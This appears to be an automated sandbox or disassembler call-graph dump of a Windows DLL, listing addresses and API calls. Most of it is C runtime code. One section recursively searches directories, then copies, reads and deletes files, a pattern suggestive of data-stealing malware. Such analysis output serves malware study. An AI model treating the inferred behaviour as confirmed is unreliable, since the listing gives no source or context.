7921 20a09645 7880->7921 7926 20a09492 GetConsoleCP 7881->7926 7882->7896 7888 20a09c56 7883->7888 7889 20a09c28 7883->7889 7887 20a09c89 GetLastError 7884->7887 7892 20a09bef 7884->7892 7885->7896 7897 20a06368 _free 20 API calls 7885->7897 7887->7892 7952 20a09728 7888->7952 7893 20a09c46 7889->7893 7894 20a09c2d 7889->7894 7892->7885 7892->7896 7900 20a09ca9 7892->7900 7944 20a098f5 7893->7944 7894->7885 7937 20a09807 7894->7937 7896->7861 7899 20a09cf2 7897->7899 7901 20a06355 __dosmaperr 20 API calls 7899->7901 7902 20a09cb0 7900->7902 7903 20a09cc4 7900->7903 7901->7896 7904 20a06368 _free 20 API calls 7902->7904 7959 20a06332 7903->7959 7906 20a09cb5 7904->7906 7907 20a06355 __dosmaperr 20 API calls 7906->7907 7907->7896 8000 20a08c9e RtlLeaveCriticalSection 7908->8000 7910 20a09aea 7910->7839 7964 20a09f8d 7911->7964 7986 20a08dbc 7914->7986 7916 20a096c2 7917 20a05af6 _abort 38 API calls 7916->7917 7918 20a096c7 7916->7918 7919 20a096ea 7917->7919 7918->7877 7918->7878 7919->7918 7920 20a09708 GetConsoleMode 7919->7920 7920->7918 7922 20a0966a 7921->7922 7925 20a0969f 7921->7925 7923 20a0a181 WriteConsoleW CreateFileW 7922->7923 7924 20a096a1 GetLastError 7922->7924 7922->7925 7923->7922 7924->7925 7925->7892 7931 20a094f5 7926->7931 7936 20a09607 7926->7936 7927 20a02ada _ValidateLocalCookies 5 API calls 7928 20a09641 7927->7928 7928->7892 7930 20a079e6 40 API calls __fassign 7930->7931 7931->7930 7932 20a0957b WideCharToMultiByte 7931->7932 7935 20a095d2 WriteFile 7931->7935 7931->7936 7995 20a07c19 7931->7995 7933 20a095a1 WriteFile 7932->7933 7932->7936 7933->7931 7934 20a0962a GetLastError 7933->7934 7934->7936 7935->7931 7935->7934 7936->7927 7941 20a09816 7937->7941 7938 20a098d8 7939 20a02ada _ValidateLocalCookies 5 API calls 7938->7939 7943 20a098f1 7939->7943 7940 20a09894 WriteFile 7940->7941 7942 20a098da GetLastError 7940->7942 7941->7938 7941->7940 7942->7938 7943->7892 7951 20a09904 7944->7951 7945 20a09a0f 7946 20a02ada _ValidateLocalCookies 5 API calls 7945->7946 7948 20a09a1e 7946->7948 7947 20a09986 WideCharToMultiByte 7949 20a09a07 GetLastError 7947->7949 7950 20a099bb WriteFile 7947->7950 7948->7892 7949->7945 7950->7949 7950->7951 7951->7945 7951->7947 7951->7950 7956 20a09737 7952->7956 7953 20a097ea 7955 20a02ada _ValidateLocalCookies 5 API calls 7953->7955 7954 20a097a9 WriteFile 7954->7956 7957 20a097ec GetLastError 7954->7957 7958 20a09803 7955->7958 7956->7953 7956->7954 7957->7953 7958->7892 7960 20a06355 __dosmaperr 20 API calls 7959->7960 7961 20a0633d _free 7960->7961 7962 20a06368 _free 20 API calls 7961->7962 7963 20a06350 7962->7963 7963->7896 7973 20a08d52 7964->7973 7966 20a09f9f 7967 20a09fa7 7966->7967 7968 20a09fb8 SetFilePointerEx 7966->7968 7969 20a06368 _free 20 API calls 7967->7969 7970 20a09fd0 GetLastError 7968->7970 7971 20a09fac 7968->7971 7969->7971 7972 20a06332 __dosmaperr 20 API calls 7970->7972 7971->7875 7972->7971 7974 20a08d74 7973->7974 7975 20a08d5f 7973->7975 7977 20a06355 __dosmaperr 20 API calls 7974->7977 7979 20a08d99 7974->7979 7976 20a06355 __dosmaperr 20 API calls 7975->7976 7978 20a08d64 7976->7978 7980 20a08da4 7977->7980 7981 20a06368 _free 20 API calls 7978->7981 7979->7966 7983 20a06368 _free 20 API calls 7980->7983 7982 20a08d6c 7981->7982 7982->7966 7984 20a08dac 7983->7984 7985 20a062ac ___std_exception_copy 26 API calls 7984->7985 7985->7982 7987 20a08dd6 7986->7987 7988 20a08dc9 7986->7988 7990 20a08de2 7987->7990 7991 20a06368 _free 20 API calls 7987->7991 7989 20a06368 _free 20 API calls 7988->7989 7992 20a08dce 7989->7992 7990->7916 7993 20a08e03 7991->7993 7992->7916 7994 20a062ac ___std_exception_copy 26 API calls 7993->7994 7994->7992 7996 20a05af6 _abort 38 API calls 7995->7996 7997 20a07c24 7996->7997 7998 20a07a00 __fassign 38 API calls 7997->7998 7999 20a07c34 7998->7999 7999->7931 8000->7910 8004 20a0ad24 8001->8004 8003 20a0adca 8003->7825 8005 20a0ad30 ___DestructExceptionObject 8004->8005 8015 20a08c7b RtlEnterCriticalSection 8005->8015 8007 20a0ad3e 8008 20a0ad70 8007->8008 8009 20a0ad65 8007->8009 8011 20a06368 _free 20 API calls 8008->8011 8016 20a0ae4d 8009->8016 8012 20a0ad6b 8011->8012 8031 20a0ad9a 8012->8031 8014 20a0ad8d _abort 8014->8003 8015->8007 8017 20a08d52 26 API calls 8016->8017 8019 20a0ae5d 8017->8019 8018 20a0ae63 8034 20a08cc1 8018->8034 8019->8018 8020 20a0ae95 8019->8020 8022 20a08d52 26 API calls 8019->8022 8020->8018 8023 20a08d52 26 API calls 8020->8023 8025 20a0ae8c 8022->8025 8026 20a0aea1 CloseHandle 8023->8026 8028 20a08d52 26 API calls 8025->8028 8026->8018 8029 20a0aead GetLastError 8026->8029 8027 20a0aedd 8027->8012 8028->8020 8029->8018 8030 20a06332 __dosmaperr 20 API calls 8030->8027 8043 20a08c9e RtlLeaveCriticalSection 8031->8043 8033 20a0ada4 8033->8014 8035 20a08cd0 8034->8035 8036 20a08d37 8034->8036 8035->8036 8040 20a08cfa 8035->8040 8037 20a06368 _free 20 API calls 8036->8037 8038 20a08d3c 8037->8038 8039 20a06355 __dosmaperr 20 API calls 8038->8039 8041 20a08d27 8039->8041 8040->8041 8042 20a08d21 SetStdHandle 8040->8042 8041->8027 8041->8030 8042->8041 8043->8033 8044->7799 8045->7779 6512 20a08a89 6515 20a06d60 6512->6515 6516 20a06d69 6515->6516 6517 20a06d72 6515->6517 6519 20a06c5f 6516->6519 6520 20a05af6 _abort 38 API calls 6519->6520 6521 20a06c6c 6520->6521 6539 20a06d7e 6521->6539 6523 20a06c74 6548 20a069f3 6523->6548 6526 20a06c8b 6526->6517 6531 20a0571e _free 20 API calls 6531->6526 6532 20a06cc9 6533 20a06368 _free 20 API calls 6532->6533 6538 20a06cce 6533->6538 6534 20a06d12 6534->6538 6572 20a068c9 6534->6572 6535 20a06ce6 6535->6534 6536 20a0571e _free 20 API calls 6535->6536 6536->6534 6538->6531 6540 20a06d8a ___DestructExceptionObject 6539->6540 6541 20a05af6 _abort 38 API calls 6540->6541 6546 20a06d94 6541->6546 6543 20a06e18 _abort 6543->6523 6545 20a055a8 _abort 38 API calls 6545->6546 6546->6543 6546->6545 6547 20a0571e _free 20 API calls 6546->6547 6575 20a05671 RtlEnterCriticalSection 6546->6575 6576 20a06e0f 6546->6576 6547->6546 6580 20a054a7 6548->6580 6551 20a06a14 GetOEMCP 6553 20a06a3d 6551->6553 6552 20a06a26 6552->6553 6554 20a06a2b GetACP 6552->6554 6553->6526 6555 20a056d0 6553->6555 6554->6553 6556 20a0570e 6555->6556 6560 20a056de __dosmaperr 6555->6560 6557 20a06368 _free 20 API calls 6556->6557 6559 20a0570c 6557->6559 6558 20a056f9 RtlAllocateHeap 6558->6559 6558->6560 6559->6538 6562 20a06e20 6559->6562 6560->6556 6560->6558 6561 20a0474f __dosmaperr 7 API calls 6560->6561 6561->6560 6563 20a069f3 40 API calls 6562->6563 6564 20a06e3f 6563->6564 6567 20a06e90 IsValidCodePage 6564->6567 6569 20a06e46 6564->6569 6570 20a06eb5 ___scrt_fastfail 6564->6570 6565 20a02ada _ValidateLocalCookies 5 API calls 6566 20a06cc1 6565->6566 6566->6532 6566->6535 6568 20a06ea2 GetCPInfo 6567->6568 6567->6569 6568->6569 6568->6570 6569->6565 6727 20a06acb GetCPInfo 6570->6727 6800 20a06886 6572->6800 6574 20a068ed 6574->6538 6575->6546 6579 20a056b9 RtlLeaveCriticalSection 6576->6579 6578 20a06e16 6578->6546 6579->6578 6581 20a054c4 6580->6581 6582 20a054ba 6580->6582 6581->6582 6583 20a05af6 _abort 38 API calls 6581->6583 6582->6551 6582->6552 6584 20a054e5 6583->6584 6588 20a07a00 6584->6588 6589 20a07a13 6588->6589 6590 20a054fe 6588->6590 6589->6590 6596 20a07f0f 6589->6596 6592 20a07a2d 6590->6592 6593 20a07a40 6592->6593 6594 20a07a55 6592->6594 6593->6594 6595 20a06d7e __fassign 38 API calls 6593->6595 6594->6582 6595->6594 6597 20a07f1b ___DestructExceptionObject 6596->6597 6598 20a05af6 _abort 38 API calls 6597->6598 6599 20a07f24 6598->6599 6600 20a07f72 _abort 6599->6600 6608 20a05671 RtlEnterCriticalSection 6599->6608 6600->6590 6602 20a07f42 6609 20a07f86 6602->6609 6607 20a055a8 _abort 38 API calls 6607->6600 6608->6602 6610 20a07f56 6609->6610 6611 20a07f94 __fassign 6609->6611 6613 20a07f75 6610->6613 6611->6610 6616 20a07cc2 6611->6616 6726 20a056b9 RtlLeaveCriticalSection 6613->6726 6615 20a07f69 6615->6600 6615->6607 6617 20a07d42 6616->6617 6621 20a07cd8 6616->6621 6618 20a07d90 6617->6618 6620 20a0571e _free 20 API calls 6617->6620 6684 20a07e35 6618->6684 6622 20a07d64 6620->6622 6621->6617 6623 20a07d0b 6621->6623 6629 20a0571e _free 20 API calls 6621->6629 6624 20a0571e _free 20 API calls 6622->6624 6625 20a07d2d 6623->6625 6632 20a0571e _free 20 API calls 6623->6632 6626 20a07d77 6624->6626 6628 20a0571e _free 20 API calls 6625->6628 6631 20a0571e _free 20 API calls 6626->6631 6627 20a07d9e 6634 20a07dfe 6627->6634 6643 20a0571e 20 API calls _free 6627->6643 6633 20a07d37 6628->6633 6630 20a07d00 6629->6630 6644 20a090ba 6630->6644 6636 20a07d85 6631->6636 6637 20a07d22 6632->6637 6638 20a0571e _free 20 API calls 6633->6638 6639 20a0571e _free 20 API calls 6634->6639 6641 20a0571e _free 20 API calls 6636->6641 6672 20a091b8 6637->6672 6638->6617 6640 20a07e04 6639->6640 6640->6610 6641->6618 6643->6627 6645 20a090cb 6644->6645 6671 20a091b4 6644->6671 6646 20a090dc 6645->6646 6647 20a0571e _free 20 API calls 6645->6647 6648 20a0571e _free 20 API calls 6646->6648 6651 20a090ee 6646->6651 6647->6646 6648->6651 6649 20a09112 6654 20a09124 6649->6654 6655 20a0571e _free 20 API calls 6649->6655 6650 20a09100 6650->6649 6653 20a0571e _free 20 API calls 6650->6653 6651->6650 6652 20a0571e _free 20 API calls 6651->6652 6652->6650 6653->6649 6656 20a09136 6654->6656 6657 20a0571e _free 20 API calls 6654->6657 6655->6654 6658 20a09148 6656->6658 6660 20a0571e _free 20 API calls 6656->6660 6657->6656 6659 20a0915a 6658->6659 6661 20a0571e _free 20 API calls 6658->6661 6662 20a0916c 6659->6662 6663 20a0571e _free 20 API calls 6659->6663 6660->6658 6661->6659 6664 20a0917e 6662->6664 6665 20a0571e _free 20 API calls 6662->6665 6663->6662 6666 20a09190 6664->6666 6668 20a0571e _free 20 API calls 6664->6668 6665->6664 6667 20a091a2 6666->6667 6669 20a0571e _free 20 API calls 6666->6669 6670 20a0571e _free 20 API calls 6667->6670 6667->6671 6668->6666 6669->6667 6670->6671 6671->6623 6673 20a091c5 6672->6673 6683 20a0921d 6672->6683 6674 20a0571e _free 20 API calls 6673->6674 6675 20a091d5 6673->6675 6674->6675 6676 20a091e7 6675->6676 6677 20a0571e _free 20 API calls 6675->6677 6678 20a091f9 6676->6678 6679 20a0571e _free 20 API calls 6676->6679 6677->6676 6680 20a0920b 6678->6680 6681 20a0571e _free 20 API calls 6678->6681 6679->6678 6682 20a0571e _free 20 API calls 6680->6682 6680->6683 6681->6680 6682->6683 6683->6625 6685 20a07e42 6684->6685 6689 20a07e60 6684->6689 6685->6689 6690 20a0925d 6685->6690 6688 20a0571e _free 20 API calls 6688->6689 6689->6627 6691 20a0926e 6690->6691 6725 20a07e5a 6690->6725 6692 20a09221 __fassign 20 API calls 6691->6692 6693 20a09276 6692->6693 6694 20a09221 __fassign 20 API calls 6693->6694 6695 20a09281 6694->6695 6696 20a09221 __fassign 20 API calls 6695->6696 6697 20a0928c 6696->6697 6698 20a09221 __fassign 20 API calls 6697->6698 6699 20a09297 6698->6699 6700 20a09221 __fassign 20 API calls 6699->6700 6701 20a092a5 6700->6701 6702 20a0571e _free 20 API calls 6701->6702 6703 20a092b0 6702->6703 6704 20a0571e _free 20 API calls 6703->6704 6705 20a092bb 6704->6705 6706 20a0571e _free 20 API calls 6705->6706 6707 20a092c6 6706->6707 6708 20a09221 __fassign 20 API calls 6707->6708 6709 20a092d4 6708->6709 6710 20a09221 __fassign 20 API calls 6709->6710 6711 20a092e2 6710->6711 6712 20a09221 __fassign 20 API calls 6711->6712 6713 20a092f3 6712->6713 6714 20a09221 __fassign 20 API calls 6713->6714 6715 20a09301 6714->6715 6716 20a09221 __fassign 20 API calls 6715->6716 6717 20a0930f 6716->6717 6718 20a0571e _free 20 API calls 6717->6718 6719 20a0931a 6718->6719 6720 20a0571e _free 20 API calls 6719->6720 6721 20a09325 6720->6721 6722 20a0571e _free 20 API calls 6721->6722 6723 20a09330 6722->6723 6724 20a0571e _free 20 API calls 6723->6724 6724->6725 6725->6688 6726->6615 6728 20a06b05 6727->6728 6736 20a06baf 6727->6736 6737 20a086e4 6728->6737 6731 20a02ada _ValidateLocalCookies 5 API calls 6733 20a06c5b 6731->6733 6733->6569 6735 20a08a3e 43 API calls 6735->6736 6736->6731 6738 20a054a7 __fassign 38 API calls 6737->6738 6739 20a08704 MultiByteToWideChar 6738->6739 6741 20a08742 6739->6741 6747 20a087da 6739->6747 6743 20a056d0 21 API calls 6741->6743 6748 20a08763 ___scrt_fastfail 6741->6748 6742 20a02ada _ValidateLocalCookies 5 API calls 6744 20a06b66 6742->6744 6743->6748 6751 20a08a3e 6744->6751 6745 20a087d4 6756 20a08801 6745->6756 6747->6742 6748->6745 6749 20a087a8 MultiByteToWideChar 6748->6749 6749->6745 6750 20a087c4 GetStringTypeW 6749->6750 6750->6745 6752 20a054a7 __fassign 38 API calls 6751->6752 6753 20a08a51 6752->6753 6760 20a08821 6753->6760 6757 20a0880d 6756->6757 6758 20a0881e 6756->6758 6757->6758 6759 20a0571e _free 20 API calls 6757->6759 6758->6747 6759->6758 6761 20a0883c 6760->6761 6762 20a08862 MultiByteToWideChar 6761->6762 6763 20a08a16 6762->6763 6764 20a0888c 6762->6764 6765 20a02ada _ValidateLocalCookies 5 API calls 6763->6765 6769 20a056d0 21 API calls 6764->6769 6771 20a088ad 6764->6771 6766 20a06b87 6765->6766 6766->6735 6767 20a088f6 MultiByteToWideChar 6768 20a08962 6767->6768 6770 20a0890f 6767->6770 6773 20a08801 __freea 20 API calls 6768->6773 6769->6771 6787 20a05f19 6770->6787 6771->6767 6771->6768 6773->6763 6775 20a08971 6777 20a056d0 21 API calls 6775->6777 6781 20a08992 6775->6781 6776 20a08939 6776->6768 6778 20a05f19 11 API calls 6776->6778 6777->6781 6778->6768 6779 20a08a07 6780 20a08801 __freea 20 API calls 6779->6780 6780->6768 6781->6779 6782 20a05f19 11 API calls 6781->6782 6783 20a089e6 6782->6783 6783->6779 6784 20a089f5 WideCharToMultiByte 6783->6784 6784->6779 6785 20a08a35 6784->6785 6786 20a08801 __freea 20 API calls 6785->6786 6786->6768 6788 20a05c45 __dosmaperr 5 API calls 6787->6788 6789 20a05f40 6788->6789 6792 20a05f49 6789->6792 6795 20a05fa1 6789->6795 6793 20a02ada _ValidateLocalCookies 5 API calls 6792->6793 6794 20a05f9b 6793->6794 6794->6768 6794->6775 6794->6776 6796 20a05c45 __dosmaperr 5 API calls 6795->6796 6797 20a05fc8 6796->6797 6798 20a02ada _ValidateLocalCookies 5 API calls 6797->6798 6799 20a05f89 LCMapStringW 6798->6799 6799->6792 6801 20a06892 ___DestructExceptionObject 6800->6801 6808 20a05671 RtlEnterCriticalSection 6801->6808 6803 20a0689c 6809 20a068f1 6803->6809 6807 20a068b5 _abort 6807->6574 6808->6803 6821 20a07011 6809->6821 6811 20a0693f 6812 20a07011 26 API calls 6811->6812 6813 20a0695b 6812->6813 6814 20a07011 26 API calls 6813->6814 6815 20a06979 6814->6815 6816 20a068a9 6815->6816 6817 20a0571e _free 20 API calls 6815->6817 6818 20a068bd 6816->6818 6817->6816 6835 20a056b9 RtlLeaveCriticalSection 6818->6835 6820 20a068c7 6820->6807 6822 20a07022 6821->6822 6831 20a0701e 6821->6831 6823 20a07029 6822->6823 6824 20a0703c ___scrt_fastfail 6822->6824 6825 20a06368 _free 20 API calls 6823->6825 6828 20a07073 6824->6828 6829 20a0706a 6824->6829 6824->6831 6826 20a0702e 6825->6826 6827 20a062ac ___std_exception_copy 26 API calls 6826->6827 6827->6831 6828->6831 6833 20a06368 _free 20 API calls 6828->6833 6830 20a06368 _free 20 API calls 6829->6830 6832 20a0706f 6830->6832 6831->6811 6834 20a062ac ___std_exception_copy 26 API calls 6832->6834 6833->6832 6834->6831 6835->6820 7235 20a02049 7236 20a02055 ___DestructExceptionObject 7235->7236 7237 20a020d3 7236->7237 7238 20a0207d 7236->7238 7248 20a0205e 7236->7248 7270 20a02639 IsProcessorFeaturePresent 7237->7270 7249 20a0244c 7238->7249 7241 20a02082 7258 20a02308 7241->7258 7242 20a020da 7244 20a02087 __RTC_Initialize 7261 20a020c4 7244->7261 7246 20a0209f 7264 20a0260b 7246->7264 7250 20a02451 ___scrt_release_startup_lock 7249->7250 7251 20a02455 7250->7251 7254 20a02461 7250->7254 7252 20a0527a _abort 20 API calls 7251->7252 7253 20a0245f 7252->7253 7253->7241 7255 20a0246e 7254->7255 7256 20a0499b _abort 28 API calls 7254->7256 7255->7241 7257 20a04bbd 7256->7257 7257->7241 7274 20a034c7 RtlInterlockedFlushSList 7258->7274 7260 20a02312 7260->7244 7276 20a0246f 7261->7276 7263 20a020c9 ___scrt_release_startup_lock 7263->7246 7265 20a02617 7264->7265 7266 20a0262d 7265->7266 7304 20a053ed 7265->7304 7266->7248 7271 20a0264e ___scrt_fastfail 7270->7271 7272 20a026f9 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 7271->7272 7273 20a02744 ___scrt_fastfail 7272->7273 7273->7242 7275 20a034d7 7274->7275 7275->7260 7281 20a053ff 7276->7281 7288 20a05c2b 7281->7288 7284 20a0391b 7285 20a0354d 7284->7285 7286 20a03925 7284->7286 7285->7263 7299 20a03b2c 7286->7299 7289 20a02476 7288->7289 7290 20a05c35 7288->7290 7289->7284 7292 20a05db2 7290->7292 7293 20a05c45 __dosmaperr 5 API calls 7292->7293 7294 20a05dd9 7293->7294 7295 20a05df1 TlsFree 7294->7295 7296 20a05de5 7294->7296 7295->7296 7297 20a02ada _ValidateLocalCookies 5 API calls 7296->7297 7298 20a05e02 7297->7298 7298->7289 7300 20a03a82 try_get_function 5 API calls 7299->7300 7301 20a03b46 7300->7301 7302 20a03b52 7301->7302 7303 20a03b5e TlsFree 7301->7303 7302->7285 7303->7302 7315 20a074da 7304->7315 7307 20a03529 7308 20a03532 7307->7308 7314 20a03543 7307->7314 7309 20a0391b ___vcrt_uninitialize_ptd 6 API calls 7308->7309 7310 20a03537 7309->7310 7319 20a03972 7310->7319 7314->7266 7318 20a074f3 7315->7318 7316 20a02ada _ValidateLocalCookies 5 API calls 7317 20a02625 7316->7317 7317->7307 7318->7316 7320 20a0397d 7319->7320 7322 20a0353c 7319->7322 7321 20a03987 RtlDeleteCriticalSection 7320->7321 7321->7321 7321->7322 7323 20a03c50 7322->7323 7324 20a03c59 7323->7324 7326 20a03c7f 7323->7326 7325 20a03c69 FreeLibrary 7324->7325 7324->7326 7325->7324 7326->7314 6836 20a0508a 6837 20a050a2 6836->6837 6838 20a0509c 6836->6838 6840 20a05000 6838->6840 6841 20a0500d 6840->6841 6845 20a0502a 6840->6845 6842 20a05024 6841->6842 6843 20a0571e _free 20 API calls 6841->6843 6844 20a0571e _free 20 API calls 6842->6844 6843->6841 6844->6845 6845->6837 7092 20a0220c 7093 20a02215 7092->7093 7094 20a0221a dllmain_dispatch 7092->7094 7096 20a022b1 7093->7096 7097 20a022c7 7096->7097 7099 20a022d0 7097->7099 7100 20a02264 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 7097->7100 7099->7094 7100->7099 7327 20a0724e GetProcessHeap 7328 20a0284f 7329 20a02882 std::exception::exception 27 API calls 7328->7329 7330 20a0285d 7329->7330 6846 20a03c90 RtlUnwind 6850 20a036d0 6851 20a036e2 6850->6851 6852 20a036f0 @_EH4_CallFilterFunc@8 6850->6852 6853 20a02ada _ValidateLocalCookies 5 API calls 6851->6853 6853->6852 8046 20a05351 8047 20a05360 8046->8047 8048 20a05374 8046->8048 8047->8048 8050 20a0571e _free 20 API calls 8047->8050 8049 20a0571e _free 20 API calls 8048->8049 8051 20a05386 8049->8051 8050->8048 8052 20a0571e _free 20 API calls 8051->8052 8053 20a05399 8052->8053 8054 20a0571e _free 20 API calls 8053->8054 8055 20a053aa 8054->8055 8056 20a0571e _free 20 API calls 8055->8056 8057 20a053bb 8056->8057 7482 20a073d5 7483 20a073e1 ___DestructExceptionObject 7482->7483 7494 20a05671 RtlEnterCriticalSection 7483->7494 7485 20a073e8 7486 20a08be3 27 API calls 7485->7486 7487 20a073f7 7486->7487 7493 20a07406 7487->7493 7495 20a07269 GetStartupInfoW 7487->7495 7492 20a07417 _abort 7506 20a07422 7493->7506 7494->7485 7496 20a07286 7495->7496 7497 20a07318 7495->7497 7496->7497 7498 20a08be3 27 API calls 7496->7498 7501 20a0731f 7497->7501 7499 20a072af 7498->7499 7499->7497 7500 20a072dd GetFileType 7499->7500 7500->7499 7502 20a07326 7501->7502 7503 20a07369 GetStdHandle 7502->7503 7504 20a073d1 7502->7504 7505 20a0737c GetFileType 7502->7505 7503->7502 7504->7493 7505->7502 7509 20a056b9 RtlLeaveCriticalSection 7506->7509 7508 20a07429 7508->7492 7509->7508 6854 20a04ed7 6855 20a06d60 51 API calls 6854->6855 6856 20a04ee9 6855->6856 6865 20a07153 GetEnvironmentStringsW 6856->6865 6859 20a04ef4 6861 20a0571e _free 20 API calls 6859->6861 6862 20a04f29 6861->6862 6863 20a0571e _free 20 API calls 6863->6859 6864 20a04eff 6864->6863 6866 20a0716a 6865->6866 6876 20a071bd 6865->6876 6869 20a07170 WideCharToMultiByte 6866->6869 6867 20a071c6 FreeEnvironmentStringsW 6868 20a04eee 6867->6868 6868->6859 6877 20a04f2f 6868->6877 6870 20a0718c 6869->6870 6869->6876 6871 20a056d0 21 API calls 6870->6871 6872 20a07192 6871->6872 6873 20a071af 6872->6873 6874 20a07199 WideCharToMultiByte 6872->6874 6875 20a0571e _free 20 API calls 6873->6875 6874->6873 6875->6876 6876->6867 6876->6868 6878 20a04f44 6877->6878 6879 20a0637b __dosmaperr 20 API calls 6878->6879 6889 20a04f6b 6879->6889 6880 20a04fcf 6881 20a0571e _free 20 API calls 6880->6881 6882 20a04fe9 6881->6882 6882->6864 6883 20a0637b __dosmaperr 20 API calls 6883->6889 6884 20a04fd1 6885 20a05000 20 API calls 6884->6885 6887 20a04fd7 6885->6887 6888 20a0571e _free 20 API calls 6887->6888 6888->6880 6889->6880 6889->6883 6889->6884 6890 20a04ff3 6889->6890 6892 20a0571e _free 20 API calls 6889->6892 6894 20a0544d 6889->6894 6891 20a062bc ___std_exception_copy 11 API calls 6890->6891 6893 20a04fff 6891->6893 6892->6889 6895 20a0545a 6894->6895 6896 20a05468 6894->6896 6895->6896 6901 20a0547f 6895->6901 6897 20a06368 _free 20 API calls 6896->6897 6898 20a05470 6897->6898 6899 20a062ac ___std_exception_copy 26 API calls 6898->6899 6900 20a0547a 6899->6900 6900->6889 6901->6900 6902 20a06368 _free 20 API calls 6901->6902 6902->6898 7101 20a02418 7102 20a02420 ___scrt_release_startup_lock 7101->7102 7105 20a047f5 7102->7105 7104 20a02448 7106 20a04804 7105->7106 7107 20a04808 7105->7107 7106->7104 7110 20a04815 7107->7110 7111 20a05b7a __dosmaperr 20 API calls 7110->7111 7114 20a0482c 7111->7114 7112 20a02ada _ValidateLocalCookies 5 API calls 7113 20a04811 7112->7113 7113->7104 7114->7112 6847 20a04a9a 6848 20a05411 38 API calls 6847->6848 6849 20a04aa2 6848->6849 6056 20a01c5b 6057 20a01c6b ___scrt_fastfail 6056->6057 6060 20a012ee 6057->6060 6059 20a01c87 6061 20a01324 ___scrt_fastfail 6060->6061 6062 20a013b7 GetEnvironmentVariableW 6061->6062 6086 20a010f1 6062->6086 6065 20a010f1 57 API calls 6066 20a01465 6065->6066 6067 20a010f1 57 API calls 6066->6067 6068 20a01479 6067->6068 6069 20a010f1 57 API calls 6068->6069 6070 20a0148d 6069->6070 6071 20a010f1 57 API calls 6070->6071 6072 20a014a1 6071->6072 6073 20a010f1 57 API calls 6072->6073 6074 20a014b5 lstrlenW 6073->6074 6075 20a014d9 lstrlenW 6074->6075 6085 20a014d2 6074->6085 6076 20a010f1 57 API calls 6075->6076 6077 20a01501 lstrlenW lstrcatW 6076->6077 6078 20a010f1 57 API calls 6077->6078 6079 20a01539 lstrlenW lstrcatW 6078->6079 6080 20a010f1 57 API calls 6079->6080 6081 20a0156b lstrlenW lstrcatW 6080->6081 6082 20a010f1 57 API calls 6081->6082 6083 20a0159d lstrlenW lstrcatW 6082->6083 6084 20a010f1 57 API calls 6083->6084 6084->6085 6085->6059 6087 20a01118 ___scrt_fastfail 6086->6087 6088 20a01129 lstrlenW 6087->6088 6099 20a02c40 6088->6099 6091 20a01177 lstrlenW FindFirstFileW 6093 20a011a0 6091->6093 6094 20a011e1 6091->6094 6092 20a01168 lstrlenW 6092->6091 6095 20a011c7 FindNextFileW 6093->6095 6096 20a011aa 6093->6096 6094->6065 6095->6093 6098 20a011da FindClose 6095->6098 6096->6095 6101 20a01000 6096->6101 6098->6094 6100 20a01148 lstrcatW lstrlenW 6099->6100 6100->6091 6100->6092 6102 20a01022 ___scrt_fastfail 6101->6102 6103 20a010af 6102->6103 6104 20a0102f lstrcatW lstrlenW 6102->6104 6107 20a010b5 lstrlenW 6103->6107 6117 20a010ad 6103->6117 6105 20a0105a lstrlenW 6104->6105 6106 20a0106b lstrlenW 6104->6106 6105->6106 6118 20a01e89 lstrlenW 6106->6118 6132 20a01e16 6107->6132 6110 20a01088 GetFileAttributesW 6112 20a0109c 6110->6112 6110->6117 6111 20a010ca 6113 20a01e89 5 API calls 6111->6113 6111->6117 6112->6117 6124 20a0173a 6112->6124 6115 20a010df 6113->6115 6137 20a011ea 6115->6137 6117->6096 6119 20a02c40 ___scrt_fastfail 6118->6119 6120 20a01ea7 lstrcatW lstrlenW 6119->6120 6121 20a01ed1 lstrcatW 6120->6121 6122 20a01ec2 6120->6122 6121->6110 6122->6121 6123 20a01ec7 lstrlenW 6122->6123 6123->6121 6125 20a01747 ___scrt_fastfail 6124->6125 6152 20a01cca 6125->6152 6129 20a0199f 6129->6117 6130 20a01824 ___scrt_fastfail _strlen 6130->6129 6172 20a015da 6130->6172 6133 20a01e29 6132->6133 6136 20a01e4c 6132->6136 6134 20a01e2d lstrlenW 6133->6134 6133->6136 6135 20a01e3f lstrlenW 6134->6135 6134->6136 6135->6136 6136->6111 6138 20a0120e ___scrt_fastfail 6137->6138 6139 20a01e89 5 API calls 6138->6139 6140 20a01220 GetFileAttributesW 6139->6140 6141 20a01235 6140->6141 6142 20a01246 6140->6142 6141->6142 6144 20a0173a 35 API calls 6141->6144 6143 20a01e89 5 API calls 6142->6143 6145 20a01258 6143->6145 6144->6142 6146 20a010f1 56 API calls 6145->6146 6147 20a0126d 6146->6147 6148 20a01e89 5 API calls 6147->6148 6149 20a0127f ___scrt_fastfail 6148->6149 6150 20a010f1 56 API calls 6149->6150 6151 20a012e6 6150->6151 6151->6117 6153 20a01cf1 ___scrt_fastfail 6152->6153 6154 20a01d0f CopyFileW CreateFileW 6153->6154 6155 20a01d44 DeleteFileW 6154->6155 6156 20a01d55 GetFileSize 6154->6156 6161 20a01808 6155->6161 6157 20a01ede 22 API calls 6156->6157 6158 20a01d66 ReadFile 6157->6158 6159 20a01d94 CloseHandle DeleteFileW 6158->6159 6160 20a01d7d CloseHandle DeleteFileW 6158->6160 6159->6161 6160->6161 6161->6129 6162 20a01ede 6161->6162 6163 20a0222f 6162->6163 6165 20a0224e 6163->6165 6168 20a02250 6163->6168 6180 20a0474f 6163->6180 6185 20a047e5 6163->6185 6165->6130 6167 20a02908 6169 20a035d2 __CxxThrowException@8 RaiseException 6167->6169 6168->6167 6192 20a035d2 6168->6192 6171 20a02925 6169->6171 6171->6130 6173 20a0160c _strcat _strlen 6172->6173 6174 20a0163c lstrlenW 6173->6174 6280 20a01c9d 6174->6280 6176 20a01655 lstrcatW lstrlenW 6177 20a01678 6176->6177 6178 20a01693 ___scrt_fastfail 6177->6178 6179 20a0167e lstrcatW 6177->6179 6178->6130 6179->6178 6195 20a04793 6180->6195 6182 20a04765 6201 20a02ada 6182->6201 6184 20a0478f 6184->6163 6191 20a056d0 __dosmaperr 6185->6191 6186 20a0570e 6214 20a06368 6186->6214 6188 20a056f9 RtlAllocateHeap 6189 20a0570c 6188->6189 6188->6191 6189->6163 6190 20a0474f __dosmaperr 7 API calls 6190->6191 6191->6186 6191->6188 6191->6190 6194 20a035f2 RaiseException 6192->6194 6194->6167 6196 20a0479f ___DestructExceptionObject 6195->6196 6208 20a05671 RtlEnterCriticalSection 6196->6208 6198 20a047aa 6209 20a047dc 6198->6209 6200 20a047d1 _abort 6200->6182 6202 20a02ae3 6201->6202 6203 20a02ae5 